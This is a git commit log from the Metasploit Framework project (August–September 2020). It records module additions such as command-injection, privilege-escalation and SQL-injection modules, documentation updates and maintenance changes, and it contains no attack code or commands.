0xsysenter 201385f111 Update modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
Remove unnecessary comma

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-15 01:23:00 +02:00
0xsysenter a9e45dc0a1 Update modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
remove unnecessary comma

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-15 01:17:01 +02:00
0xsysenter 9c5f64d692 Update modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
fix disclosure date format

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-15 01:15:53 +02:00
Pietro Oliva f10ed189e9 Add module for TP-Link Cameras Command Injection (CVE-2020-12109) 2020-09-14 14:20:42 -04:00
Niboucha Redouane ca32a15f8d Remove trailing comma after the URL reference
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-14 19:03:57 +02:00
Niboucha Redouane 69ed4be81d Remove trailing comma after :auth_bypass
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2020-09-14 19:03:37 +02:00
Metasploit 67dbb34769 automatic module_metadata_base.json update 2020-09-14 11:50:55 -05:00
Christophe De La Fuente e11840c2a5 land #14031, F5 processor 2020-09-14 18:38:58 +02:00
Chris Long bc838f993c Adding impacket dependency to Dockerfile 2020-09-12 20:42:39 -07:00
h00die daa10ea735 enhance user data parsing 2020-09-12 10:07:23 -04:00
cn-kali-team 6ba06f2e74 add protocols 2020-09-12 15:29:02 +08:00
Spencer McIntyre 61fd7334b7 Land #13571, add Session notified to DingTalk Bot 2020-09-11 18:13:47 -04:00
Grant Willcox 03c410215e Add HyperSine as an author since he discovered the decryption keys, update some of the logic to use ternary operators to be more explicit in nature, update securecrt_crypto to fix a bug where it could end up with a defined return value, update the warnings to be a bit more explicit, and fix a logic bug in the run function due to how expand_path and registry_getvaldata interact with one another 2020-09-11 16:55:16 -05:00
Metasploit 38700737aa automatic module_metadata_base.json update 2020-09-11 15:09:25 -05:00
bwatters 3f689ccae9 Add warning for screen effect to tccbypass 2020-09-11 15:07:52 -05:00
bwatters f248f20b9e Land #13942, Add module for CVE-2020-9934
Merge branch 'land-13942' into upstream-master
2020-09-11 14:58:50 -05:00
Grant Willcox 2a520606f7 Apply fixes to module and documentation so that the output is easier to understand, contains better installation instructions, and also reflects the fact that this module really gathers SecureCRT sessions and decrypts the password if it is available, aka its still useful even if we don't decrypt the password 2020-09-11 13:41:56 -05:00
Brendan Coles 485c51c88c Add VyOS restricted-shell Escape and Privilege Escalation 2020-09-11 18:19:25 +00:00
Brendan Coles febe38e1ce resolve qa comments 2020-09-11 17:16:10 +00:00
Shelby Pace ff500dd9fb add poc 2020-09-11 12:00:16 -05:00
Shelby Pace d86f9427c9 change version check and add sleep 2020-09-11 11:49:14 -05:00
cn-kali-team ea41644e73 add doc 2020-09-11 23:05:25 +08:00
Grant Willcox b3d386bdb4 Apply msftidy_docs.rb fixes and RuboCop the module 2020-09-11 09:40:37 -05:00
Tim W 93cdba483d add documentation 2020-09-11 17:31:40 +08:00
Lucas Vater 9101b4fba6 Group multi-column search conditions
Previously the OR-relations generated by the multi-column search method
were not grouped, resulting in wrong precedence in places where they are
used.
2020-09-11 08:40:28 +02:00
cn-kali-team 2a50368591 remove comment 2020-09-11 11:54:12 +08:00
cn-kali-team 7267c504c3 add Gather_Securecrt_Password module 2020-09-11 11:40:52 +08:00
Grant Willcox 905fb73b7a Add in initial copy of module and documentation 2020-09-10 18:52:13 -05:00
Shelby Pace e5c9439974 rubocop and metadata additions 2020-09-10 18:32:30 -05:00
Shelby Pace 926398dd6f add remaining docs info 2020-09-10 18:25:34 -05:00
Shelby Pace 8474462458 add command stager usage 2020-09-10 18:02:07 -05:00
adfoster-r7 a9197c482f Land #14111, remove calculation of payload sizes on boot 2020-09-10 22:10:25 +01:00
Metasploit bb5bc942ab Bump version of framework to 6.0.7 2020-09-10 13:38:26 -05:00
Adam Cammack e95bd3b6f8 Bump version of framework to 6.0.6 2020-09-10 13:19:11 -05:00
Metasploit 0fcc94f08e automatic module_metadata_base.json update 2020-09-10 12:01:47 -05:00
Grant Willcox d4cf660e61 Land #12983, Dnsadmin ServerLevelPluginDLL Feature Abuse Privilege Escalation 2020-09-10 11:49:42 -05:00
gwillcox-r7 593945ee61 Update module documentation with more detail r.e affected versions and the fact that the use of UNC paths could cause an issue if they are not typed in correctly. Also update the module documentation to use the output from recent tests to reflect recent changes. Shortern the module description and update its stability rating. Finally add in a reliability rating for the exploit module. 2020-09-10 11:32:45 -05:00
gwillcox-r7 16b27ae270 Add in version checking to ensure we only check if the target has the 'Enable insecure guest logons' enabled if their build number is greater than or equal to 10.0.16299.0, which was the build where this change first was implemented. 2020-09-10 11:32:45 -05:00
gwillcox-r7 45480373a9 Fix up the exploit module so that it will not wait for AV if a UNC path is used, as there is no chance the AV on the host can remove the file on the UNC share, and the UNC share won't be accessed until the exact moment it is needed 2020-09-10 11:32:45 -05:00
gwillcox-r7 7e1560ff26 Update documentation with the installation instructions I mentioned in the GitHub comments. Also RuboCop the exploit module code. 2020-09-10 11:32:18 -05:00
gwillcox-r7 0d493bbc54 Add in extra code to handle cases where the loops may enter a infinte loop state. New code should prevent this from happening 2020-09-10 11:32:18 -05:00
gwillcox-r7 a94d36248b Add in the AVTIMEOUT option to allow the module to check if any AV or other processes deleted the uploaded DLL file, thereby preventing a situation where the DNS server is unable to restart. Also add in some warning's r.e when we enter the danger section and when we exit it so that users at more aware of when this is happening. 2020-09-10 11:32:18 -05:00
gwillcox-r7 d0fe87fbf6 Update documentation with some updated info about potentially bad situations the module could run into, and also include some new documentation on the new option we have added in to try to prevent this from happening 2020-09-10 11:32:18 -05:00
gwillcox-r7 78dc43efa5 Fix up incorrect regex within the check method to fix a logic bug 2020-09-10 11:32:18 -05:00
ide0x90 c4d463e921 Added option to generate standalone DLL. 2020-09-10 11:32:18 -05:00
ide0x90 53f3b70b33 Changed DLL so that it doesn't block the DNS service from stopping after the module executes.
Added OS check (>= Server 2003 is vulnerable so far).
Now cleans up dropped DLL and modified registry value.
2020-09-10 11:32:18 -05:00
ide0x90 7701ea1bc8 Compile DLL so that the DNS service doesn't crash when the module is run. 2020-09-10 11:32:18 -05:00
ide0x90 151fdb7ea5 Reduced exploit ranking and added check to see if session is elevated. 2020-09-10 11:32:18 -05:00
ide0x90 d1e9039af4 Initial module and documentation for Microsoft Windows DNS ServerLevelPluginDll abuse 2020-09-10 11:31:51 -05:00
Metasploit bfdbb909fd automatic module_metadata_base.json update 2020-09-10 11:04:53 -05:00
Grant Willcox bc49826766 Land #14099, Fix user path in enum_powershell_env for new versions of Windows 2020-09-10 10:53:15 -05:00
Metasploit fe6bfad8fb automatic module_metadata_base.json update 2020-09-10 10:00:24 -05:00
Adam Cammack cc8321e8c8 Land #14096, Fix payload cache size generation 2020-09-10 09:47:52 -05:00
Adam Galway 6a011fe1ee Land #14112, stale bot operations now 25 per run 2020-09-10 14:26:52 +01:00
dwelch-r7 df7483af6c Remove sizes hash and calculation of payload sizes on boot 2020-09-10 12:57:40 +01:00
Shelby Pace 89d07c472a add documentation 2020-09-09 18:55:23 -05:00
dwelch-r7 d63a79b35f Increase operations per run 2020-09-09 16:35:31 +01:00
Spencer McIntyre f2e3480469 Just give travis the sizes it's expecting 2020-09-09 08:49:01 -04:00
Tim W 686ef94e37 fix mkdir 2020-09-09 15:36:31 +08:00
Tim W c725a713af more feedback from bcoles 2020-09-09 14:21:03 +08:00
Tim W d447bbc3dc feedback from bcoles 2020-09-09 13:27:11 +08:00
Tim W 42d70bb2a2 Add module for CVE-2020-9934 2020-09-09 13:27:11 +08:00
Metasploit 9a5f393e0b automatic module_metadata_base.json update 2020-09-08 13:14:38 -05:00
gwillcox-r7 488977bec7 Land #13836, Add Modbus banner grabbing module 2020-09-08 13:03:44 -05:00
gwillcox-r7 0270a09d10 Add in further fixes to address issues discovered during manual code review, and then apply RuboCop fixes 2020-09-08 12:29:39 -05:00
gwillcox-r7 ea8cf7b71e Fix up one of the documentation lines to reflect the fact that we can get the version number in the major.minor version format. Also fix up the Options section to remove the default option and replace it with a line that I think should be more appropriate 2020-09-08 12:29:38 -05:00
Juan Escobar 710ac48d26 Remove the UNIT_ID option from the registers_option section and from the documentation, and update the module with a link to the Modbus protocol specification. 2020-09-08 12:28:14 -05:00
gwillcox-r7 c6d98a537b Add in various fixes for review comments, including description improvements, validation of the UNIT_ID value, and fixes to the return values of some functions. Also update the documentation to address issues from first round of the review. 2020-09-08 12:27:47 -05:00
itsecurityco 182797fcbb Update documentation to fix spelling mistakes and grammar issues 2020-09-08 12:27:35 -05:00
itsecurityco bec08f5f3e more appropiate message when num_object is null 2020-09-08 12:27:35 -05:00
Juan 5f75479bb0 bold title 2020-09-08 12:27:35 -05:00
Juan 04e09267cf Refactor the module's code and fix several typos
Co-authored-by: bcoles <bcoles@gmail.com>
2020-09-08 12:27:00 -05:00
itsecurityco a2a69f58a7 Improve documentation 2020-09-08 12:26:33 -05:00
itsecurityco 288a35f701 patch bug when unit id is invalid 2020-09-08 12:26:33 -05:00
itsecurityco a0f91d93ad Upload initial copy of the module and its documentation 2020-09-08 12:26:06 -05:00
Adam Galway 6a1d26aa80 Land #14106, search hightlights multiple matches 2020-09-08 14:37:08 +01:00
Alan Foster 437f11bf56 Updates search command to always show additional usage details 2020-09-08 13:30:56 +01:00
adfoster-r7 b0696343a4 Land #14090, Add example of info 3 to the search results 2020-09-08 13:23:41 +01:00
Adam Galway 645562a7de Land #14104, excludes more labels from stale bot 2020-09-08 12:52:38 +01:00
dwelch-r7 5769519d2d Exclude more labels from stale bot 2020-09-08 12:08:36 +01:00
Metasploit 190d5c3843 automatic module_metadata_base.json update 2020-09-07 09:55:54 -05:00
adfoster-r7 be5cd6e26c Land #14089, update smb_version module to use select instead of filter for backwards compatibility 2020-09-07 15:45:04 +01:00
adfoster-r7 97f523b1b1 Land #14056, activate stale bot 2020-09-07 15:08:52 +01:00
dwelch-r7 234ef7cd6d Reduce operations per run 2020-09-07 14:07:54 +01:00
Niboucha Redouane 6acdb3a440 minor update to the documentation, and module top comment 2020-09-06 16:00:48 +02:00
James Lee a870b1df71 Fix user path on newer Windows 2020-09-05 10:43:41 -05:00
Metasploit ce17c434ae automatic module_metadata_base.json update 2020-09-04 16:04:03 -05:00
bwatters e592736833 Land #13992, Add module for CVE-2020-9839, LPE for macOS <= 10.15.4
Merge branch 'land-13992' into upstream-master
2020-09-04 15:53:17 -05:00
bwatters 5e2a3a6f65 Recompiled binary exploit file to match source 2020-09-04 15:46:52 -05:00
Spencer McIntyre 1b77d01f23 Fix a payload cache size generation issue and bump the gem 2020-09-04 15:43:55 -04:00
Niboucha Redouane 233120fb8d remove trailing whitespace on L78 2020-09-04 19:09:37 +02:00
Niboucha Redouane 13b3e58be0 Create sqli objects in run and check independently 2020-09-04 15:43:17 +02:00
adfoster-r7 749423da02 Land #14091, update issue template with the debug command 2020-09-04 14:30:31 +01:00
Adam Galway 2c1b6eddfc Updates bug report to include debug instructions 2020-09-04 14:28:01 +01:00
Metasploit d69f344b30 automatic module_metadata_base.json update 2020-09-04 05:00:44 -05:00
cgranleese-r7 2e19c9ec83 Add example of info 3 to the search results 2020-09-04 10:53:04 +01:00
Adam Galway 242656bc07 Land #13978, proxy support for Python Meterpreter 2020-09-04 10:50:41 +01:00
Tim W 7b1f5c1728 add documentation 2020-09-04 17:42:30 +08:00
Erik Geiser efaeb1b80e Use select in smb_version scanner for ruby <= 2.5
Use Array.select! instead of Array.filter! (which is an alias for the
former) in the smb_version scanner module to be compatible with ruby
versions <= 2.5.
2020-09-04 10:54:20 +02:00
Tim W 2eafba3b11 add documentation 2020-09-04 16:09:43 +08:00
Tim W be2fe15116 fix pdfpath and uripath 2020-09-04 16:09:40 +08:00
Spencer McIntyre ff00202db7 Update the TECHNIQUE hash in the priv extension 2020-09-03 14:41:44 -04:00
Metasploit d8447e9708 Bump version of framework to 6.0.5 2020-09-03 12:04:46 -05:00
Metasploit 0e6f6cdbbe automatic module_metadata_base.json update 2020-09-02 17:27:20 -05:00
bwatters 8fb8b00539 Land #14075, Add support for ZIP file generation in zip_slip exploit
Merge branch 'land-14075' into upstream-master
2020-09-02 17:15:27 -05:00
bwatters 149566b30e Run rubocop 2020-09-02 17:14:30 -05:00
Metasploit 8c215c758e automatic module_metadata_base.json update 2020-09-02 15:32:19 -05:00
gwillcox-r7 20e4b3e71f Land #14083, Update enum_patches.rb to include the patch installation date 2020-09-02 15:21:14 -05:00
gwillcox-r7 f10871a776 Update documentation for the enum_patches.rb module to reflect recent changes to its code and output 2020-09-02 15:20:36 -05:00
Metasploit d15e27fc9e automatic module_metadata_base.json update 2020-09-02 14:53:43 -05:00
gwillcox-r7 161083e6e4 Land #14084, Add writeup URL reference to peplink_bauth_sqli 2020-09-02 14:44:15 -05:00
gwillcox-r7 632a3bd0da Land #14081, Move SECURITY.md from root folder to the .github folder 2020-09-02 14:36:59 -05:00
Tod Beardsley 3e582ecd67 Move just SECURITY.md to .github 2020-09-02 14:31:11 -05:00
Shelby Pace 4d9f5e14e8 remove pry statement and comments 2020-09-02 13:41:33 -05:00
Shelby Pace 1e90d10531 add functionality for channel setup 2020-09-02 13:37:41 -05:00
Arjun G b2bd40ef03 Updated module description
Changed string description to call out the modified WMI query that now also pulls in the InstalledOn metadata for a given KB.
2020-09-02 11:33:50 -07:00
Niboucha Redouane 6d1a905206 Add url reference to a writeup on implementing the module 2020-09-02 20:19:03 +02:00
Arjun G ca846fa8c1 Changing print statements to follow Ruby style
In response to PR feedback
2020-09-02 10:59:15 -07:00
Niboucha Redouane 314fb755c0 update comment on Author metadata 2020-09-02 19:43:06 +02:00
Metasploit 534bd1fcd2 automatic module_metadata_base.json update 2020-09-02 12:32:47 -05:00
Spencer McIntyre c2d49384c0 Land #13980, Reflective PE Payloads Added 2020-09-02 13:22:30 -04:00
Spencer McIntyre 67df4ea672 Adjust verbiage and whitespace, remove a buggy asm instruction 2020-09-02 13:20:50 -04:00
Niboucha Redouane 1b09ecfd04 make auth_bypass return a checkcode 2020-09-02 17:50:09 +02:00
ggkitsas 62d3d9bc9a fix: reverts misuse of in zip_slip exploit 2020-09-01 21:49:55 +01:00
Niboucha Redouane 1d4c0bedfc base64-encode the command in the check method 2020-09-01 20:58:37 +02:00
Niboucha Redouane 9d3981723b use hex encoding in command injection 2020-09-01 18:26:25 +02:00
Metasploit e01d9e701b automatic module_metadata_base.json update 2020-09-01 09:54:09 -05:00
Adam Galway 3690bafeb6 Land #14050, fixes db_import bug with zip files 2020-09-01 15:41:17 +01:00
bwatters b135367730 Land #14068, Update smb_enum_gpp to use RubySMB
Merge branch 'land-14068' into upstream-master
2020-09-01 09:33:15 -05:00
Spencer McIntyre e54d6857ea Land #13919, [GSoC] Ev2 - Easier actions interaction system for modules implemented 2020-09-01 09:23:06 -04:00
Spencer McIntyre c8a8e1ccd4 Land #14062, Add a SECURITY.md file 2020-09-01 08:44:12 -04:00
Tim W 1693a3c787 add exploit binaries 2020-09-01 17:14:21 +08:00
Tim W 301754c648 remove CMakeLists.txt 2020-09-01 17:14:21 +08:00
María Belén Tualombo Chimbo 9eca457358 avoid using the datastore and use kwarg 2020-09-01 04:30:14 -04:00
Tim W 9150f0bc3a move int64.js and utils.js to javascript_utils folder 2020-09-01 16:14:31 +08:00
Tim W 46db23c35e fix int64.js and utils.js 2020-09-01 16:14:30 +08:00
María Belén Tualombo Chimbo 887a84ecf9 if added 2020-09-01 04:09:03 -04:00
Tim W c23cb63c6e exploit binary 2020-09-01 14:10:34 +08:00
Arjun G fb4acd53b5 Include KB installation date in enum_patches
Currently, the output of this module only lists the KB packages installed on a Windows PC. 

This change improves the module by also having it output when a given patch package was installed (this information can also be retrieved from the WMI query); this will provide insight into how regularly and reliably a PC (and by extension, environment) patches - for example, are they late in installing patches by months, when did they last patch etc.
2020-08-31 17:38:02 -07:00
Spencer McIntyre 27a2ef6945 Land #14072, Python3 / bash checks and improvements when using 'shell' 2020-08-31 17:35:32 -04:00
Reelix 296a0654da Update lib/msf/core/payload/python.rb
- Implemented bug fix and naming improvement as suggested by @smcintyre-r7

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2020-08-31 22:52:27 +02:00
Reelix d46f0cec48 Update python.rb
- Added py_create_exec_stub required for https://github.com/rapid7/metasploit-framework/pull/14072
2020-08-31 21:22:46 +02:00
Reelix f5a85890fd Update command_shell.rb
- Implement changes suggested by @smcintyre-r7
2020-08-31 21:16:33 +02:00
Ege Balcı 84b229d393 Major changes on x64 PE loader and several improvments 2020-08-31 21:35:59 +03:00
Tod Beardsley cd69e2a1d9 Fix SECURITY.md for less clever GH Issues and link 2020-08-31 13:25:56 -05:00
gwillcox-r7 e7ad8d93df Land #14065, Switch to lazily loading the faker module 2020-08-31 12:06:11 -05:00
Brendan Coles f5717e2a17 Add software URL 2020-08-31 15:50:37 +00:00
Metasploit 12d1ec8769 automatic module_metadata_base.json update 2020-08-31 10:07:19 -05:00
Spencer McIntyre 3a87dfac8a Land #14066, report CheckCode for check failure 2020-08-31 10:57:01 -04:00
Jeffrey Martin ddb6782d8d convert from fail_with to detailed CheckCode 2020-08-31 09:46:16 -05:00
Spencer McIntyre e5e1ce7816 Land #14064, fixed module html references for info -d command 2020-08-31 10:45:18 -04:00
Niboucha Redouane cd38077974 Add the non-encoded serialized object in the script, to make it more readable 2020-08-31 15:15:52 +02:00
ggkitsas 788244150c Add support for zip generation in zip_slip exploit 2020-08-31 13:18:14 +01:00
Niboucha Redouane 82d8b92e24 add module documentation 2020-08-30 16:57:01 +02:00
Niboucha Redouane f96ad15dfa minor fix / refactoring 2020-08-30 16:31:04 +02:00
Brendan Coles 9d33ebd54a Add Mida Solutions eFramework ajaxreq.php Command Injection 2020-08-30 12:46:00 +00:00
Niboucha Redouane efdbf5716c avoid printing on methods called from check, and remove autocheck 2020-08-30 13:53:55 +02:00
Niboucha Redouane 2fde21a621 add check method, and address feedback from bcoles 2020-08-30 12:45:40 +02:00
Niboucha Redouane 7a120ef60b Add EDB and PACKETSTORM references
Co-authored-by: bcoles <bcoles@gmail.com>
2020-08-30 12:44:12 +02:00
Reelix b9db589105 Update command_shell.rb
- Converted a missed tab to spaces
2020-08-30 09:48:19 +02:00
Reelix b61a5e5f75 Update command_shell.rb
- Fixed spacing (Tabs VS Spaces)
2020-08-30 09:45:38 +02:00
Reelix e2a008eade Update command_shell.rb
- Improved path detection
- Check for bash with python / python3 and use it if it exists
- Minor grammatical improvements
2020-08-30 09:22:25 +02:00
María Belén Tualombo Chimbo 256096dd03 minor fix 2020-08-29 17:43:16 -04:00
María Belén Tualombo Chimbo 30bebdba26 some minor changes 2020-08-29 17:38:19 -04:00
María Belén Tualombo Chimbo db4de72be8 lowercase added to help output for action commands 2020-08-29 14:00:15 -04:00
María Belén Tualombo Chimbo b4e555c7cc Tab-completion improved for module OPTIONS not available 2020-08-29 13:31:52 -04:00
María Belén Tualombo Chimbo 769b4ab5dc help output for action commands updated 2020-08-29 05:51:53 -04:00
Spencer McIntyre 58a56a2b24 Support an explicit backend for the SMB simple client 2020-08-28 17:28:07 -04:00
Spencer McIntyre d58cb9f9c8 Add documentation for the smb_enum_gpp module 2020-08-28 16:34:29 -04:00
Spencer McIntyre 9acafb7797 Update the smb_enum_gpp module to work with RubySMB 2020-08-28 16:20:42 -04:00
Niboucha Redouane 97d134fe07 Refactor PostgreSQL version of the SQLi library to use utils 2020-08-28 20:29:32 +02:00
Niboucha Redouane 6bb9f9d629 Fix postgreSQL documentation 2020-08-28 20:10:19 +02:00
Niboucha Redouane b23b72fa19 Add documentation for dlink_central_wifimanager_sqli, and add write_to_file to PostgreSQLi 2020-08-28 20:10:19 +02:00
Niboucha Redouane ef33afecc1 Add an SQLi module for CVE-2019-13373 2020-08-28 20:10:19 +02:00
Niboucha Redouane e4364ed6e7 Fix safe mode 2020-08-28 20:10:19 +02:00
Niboucha Redouane 99449f46ef Add initial version of PostgreSQL injection support 2020-08-28 20:10:19 +02:00
Niboucha Redouane 1d4d6c384b Merge support for PostgreSQL injection with the branch having support for SQLite and MySQL/MariaDB 2020-08-28 20:09:45 +02:00
Jeffrey Martin 983434aff6 fix a missing argument for fail_with 2020-08-28 10:55:09 -05:00
C4ssandre 85ccac215b Removing precompiled binaries (dll exploits). 2020-08-28 17:37:34 +02:00
C4ssandre 1b68a41c9a Formatting code by removing whitespaces. 2020-08-28 17:34:49 +02:00
Christophe De La Fuente 5c416c971c Bump ruby_smb version in Gemfile.lock 2020-08-28 16:42:46 +02:00
dwelch-r7 c92bc38a86 switch to lazy loading faker 2020-08-28 14:56:11 +01:00
C4ssandre 995d6a7fc9 Changing all printf and wprintf to dprintf macro, defined in pch.h 2020-08-28 15:27:23 +02:00
adfoster-r7 760aba0ace Land #14061, ensure framework options are passed through from msfvenom
Reduce msfvenom run time by only loading relevant modules
2020-08-28 12:44:52 +01:00
adfoster-r7 763448c971 Land #14053, Add the ability to use numerics with the info command 2020-08-28 11:07:34 +01:00
cgranleese-r7 d6b9165c7c fixed module html references for info -d command 2020-08-28 10:59:22 +01:00
Metasploit f14f70d3e6 automatic module_metadata_base.json update 2020-08-28 04:32:34 -05:00
cgranleese-r7 e094a55ff2 Add the ability to use numerics with info command 2020-08-28 10:28:07 +01:00
adfoster-r7 62d45870dc Land #14040, Use CheckModule auxiliary/scanner/misc/java_rmi_server in exploit/multi/misc/java_rmi_server 2020-08-28 10:22:35 +01:00
Ege Balcı 4bd8690370 Several bug fixes on x64 PE loader and PE mapper 2020-08-28 01:08:29 +03:00
Metasploit a61db036d7 automatic module_metadata_base.json update 2020-08-27 16:59:46 -05:00
Jeffrey Martin 1d2443ce1e Land #13847, [GSoC] Add SQLite injection support 2020-08-27 16:40:11 -05:00
Niboucha Redouane 8d64cb9b6b Rename the common utilities from utils to common 2020-08-27 22:54:42 +02:00
todb-r7 ca590c7aff Add a SECURITY.md file
Git has this cool sheild button on the ribbon on every project now that
indicates the vulnerability reporting policy for that project. We should
totally populate this so people don't accidnetally dox our bugs on
Issues.
2020-08-27 15:12:53 -05:00
adfoster-r7 177f720f80 Land #14021, when searching modules for multiple text terms, the search will now require for all words to be matched 2020-08-27 20:02:55 +01:00
Niboucha Redouane d66bb4058e Fix documentation, remove unused instance variable in SQLite TimeBasedBlind class (sleepdelay) 2020-08-27 19:08:27 +02:00
Metasploit 935340ab2a Bump version of framework to 6.0.4 2020-08-27 12:05:38 -05:00
adfoster-r7 de0826f353 Merge pull request #2, Pass args through to search for cmd_use 2020-08-27 17:47:20 +01:00
dwelch-r7 4ace8e39c1 Pass args through to search for cmd_use 2020-08-27 17:39:43 +01:00
María Belén Tualombo Chimbo bbb032b83d minor fix 2020-08-27 11:42:12 -04:00
María Belén Tualombo Chimbo ddfc554026 Some improvements suggested for code optimization 2020-08-27 11:29:25 -04:00
Niboucha Redouane d54046fc1b Make peplink_bauth_sqli a gather module, and gather as much useful data as possible 2020-08-27 16:28:39 +02:00
Niboucha Redouane 3e73f5efe4 get_cookies insead of accessing the Set-Cookie header
as the #get_cookies method is getting fixed to support case-insensitive cookie presence checking

Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
2020-08-27 16:28:39 +02:00
Niboucha Redouane 24b5f8a332 Refactor peplink_bauth_sqli to support check 2020-08-27 16:28:39 +02:00
Niboucha Redouane 7a89542b28 add error messages when no sessions found, and run msftidy_docs 2020-08-27 16:28:39 +02:00
Niboucha Redouane 348c955253 Add documentation for peplink_bauth_sqli 2020-08-27 16:28:39 +02:00
Niboucha Redouane b9b242391f Fix peplink_bauth_sqli module authors 2020-08-27 16:28:38 +02:00
Niboucha Redouane a681f7ac46 Add more options to the peplink SQLi module 2020-08-27 16:28:38 +02:00
Niboucha Redouane 6cd9fa81d6 Add first version of peplink SQLi module (DBMS used being SQLite3) 2020-08-27 16:28:38 +02:00
Niboucha Redouane 4e302dc42b Move get_bitmask to the SQLi::Utils module 2020-08-27 16:28:38 +02:00
Niboucha Redouane 95ce79b418 Add more options to the test module 2020-08-27 16:28:38 +02:00
Niboucha Redouane 2bb2b73dc2 Refactor to avoid repetitive code on Blind SQLi implementations 2020-08-27 16:28:38 +02:00
Niboucha Redouane 080e25ee6a Various fixes and enhacements to the comments, and addition of write_to_file method 2020-08-27 16:28:38 +02:00
Niboucha Redouane e0c59ede5c Comment the SQLite methods 2020-08-27 16:28:38 +02:00
Niboucha Redouane 1c69dfd5df Add safe mode for SQLi, and support limiting the number of rows to be returned 2020-08-27 16:28:38 +02:00
Niboucha Redouane a42ae5280b Update SQLite support to work with the new factory redesign 2020-08-27 16:28:38 +02:00
Niboucha Redouane 4374edd37a add truncated SQLi in SQLite, and update test module to add it as an option 2020-08-27 16:28:38 +02:00
Niboucha Redouane 8f9a849591 fix test module, and fix logging 2020-08-27 16:28:38 +02:00
Niboucha Redouane 477f7313a2 Avoid repertitive code in blind injections 2020-08-27 16:28:38 +02:00
Niboucha Redouane 26e5fc99de add SQLite injection library, and test module (against sqlite_lab) 2020-08-27 16:28:38 +02:00
dwelch-r7 98eaef20b3 Reduce msfvenom run time by only loading relevant modules
Work was already done, just need the args passed in
2020-08-27 15:25:33 +01:00
Metasploit 07acf7bd37 automatic module_metadata_base.json update 2020-08-27 09:00:13 -05:00
Spencer McIntyre 5e636c8c84 Land #13906, Add a generic LDAP hashdump module 2020-08-27 09:50:15 -04:00
Spencer McIntyre aa60b4efc0 Switch back to using fail_with now that the issue is fixed 2020-08-27 09:14:51 -04:00
Hynek Petrak f8bf996233 parent 1bd4a8d752
author Hynek Petrak <hynek.petrak@gmail.com> 1595628792 +0200
committer Spencer McIntyre <Spencer_McIntyre@rapid7.com> 1598532753 -0400

Added module to dump hashes from LDAP

added hash formatters, documentation, ldap authentication

typo

sanitizing

added scenario for NASDeluxe

added few hash attribute examples

typo correction

Co-authored-by: bcoles <bcoles@gmail.com>

typo correction

Co-authored-by: bcoles <bcoles@gmail.com>

typo correction

Co-authored-by: bcoles <bcoles@gmail.com>

avoid option name conflicts

added test scenario

linted

linted

Dump all nameContexts, not just the first one. Search creds in multiple attributes.

attemt to dump special and operational attributes

check if ldap bind succeeded

sanitize the ldap hashes, skip invalid, remove {crypt} prefix

memory optimization for large LDAP servers

spaces at eols

put header to the ldif loot

added other LDAP hash formats, don't save empty ldif, dump root DSE

now we handle vmdir case too

explictly set md5crypt for $

Converted to scanner to improve performance on large networks

krbprincipalkey, memory optimization for ldap.search

handle additional hash types

be verbose about search errors

added per host timeout

catch exception from Net::Ldap

shorten the param value

handle pwdhistory entries

added comment about sambapwdhistory value

reject shorter empty sambapassordhistory entries

reject null nt and lm hashes

report assumed clear text passwords

refactored timeout for the sake of the loot

ignore {SASL} pass-trough auth entries

distinguish unresolved hashes from clear passwords

print ldap server error message, meaningful loot name

correct exception handling

handle hashes with eol

remove debug line

handle pkcs12 in binary form

attemt to control timeout on bind operation

leave LDAP#bind to be called implicitly in #search

remove debug line

fixed bug, when pillage broke the outer LDAP#search

learning ruby

monkey patched ldap connection handling, ignoring bind errors

commenting the net:LDAP misbehaviour

review fixes

review fixes

moving ldap.search into a function

remove fail_with, store loot from one place, print statistics

linting

consolidated ldap_new and connect, don't catch exceptions in the mixin

Complete the credential creation

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2020-08-27 09:05:07 -04:00
Tim W b0864e17cc fix WebKit build 2020-08-27 20:06:02 +08:00
Metasploit 518e7b3cd6 automatic module_metadata_base.json update 2020-08-27 06:44:50 -05:00
Tim W 806455abbc fix 2020-08-27 19:36:45 +08:00
Tim W 33fa4d1424 dynamic offsets 2020-08-27 19:36:45 +08:00
Tim W 52fb91f2ba move loader offsets to offset table 2020-08-27 19:36:45 +08:00
Tim W a94389fb76 cleanup cvm_side 2020-08-27 19:36:45 +08:00
Tim W 6bd8fb14d0 fix offsets for 10.15.3 and 10.15.4 2020-08-27 19:36:45 +08:00
Tim W c7d0a1b2a8 add offsets for 10.15.4 2020-08-27 19:36:45 +08:00
Tim W 0a1fb600a2 fix source versions and jscell headers 2020-08-27 19:36:45 +08:00
Tim W 27238abfdc kill first time app launch popup 2020-08-27 19:36:45 +08:00
Tim W 8ba7e9ca62 msftidy 2020-08-27 19:36:45 +08:00
Tim W 990ecdd097 split exploit js into function 2020-08-27 19:36:45 +08:00
Tim W 8ac2a27596 fix payload targets 2020-08-27 19:36:45 +08:00
Tim W a8b34bae67 whitespace 2020-08-27 19:36:44 +08:00
Christophe De La Fuente af06429629 Land #14048 - Allow scanner modules to skip hosts on fail_with 2020-08-27 13:32:51 +02:00
Tim W c069d940a9 fix restoring of /etc/pam.d/login 2020-08-27 19:04:43 +08:00
dwelch-r7 bea6259560 Set exempt labels 2020-08-26 22:09:16 +01:00
William Vu c45c01f888 Rescue connection errors and return a CheckCode
Oops, the Scanner mixin was silently catching them.
2020-08-26 12:34:03 -05:00
Ege Balcı 66292a5f28 DLL preamble fixed & exitfunk is now optional 2020-08-26 19:45:44 +03:00
Ege Balcı 071eb14e4e Update lib/msf/core/payload/windows/x64/reflective_pe_loader.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2020-08-26 19:04:17 +03:00
Spencer McIntyre 855aa3c521 Override fail_with in auxiliary/scanner to add an abort kwarg 2020-08-26 09:10:01 -04:00
Matthew Hagan 97eb04a1e3 Fixing zip import errors
in particular:
•passed workspace as an object instead of calling `.name`
*loot and task processing now consumes `wspace` parameter
*fixed typo in `.delete` method
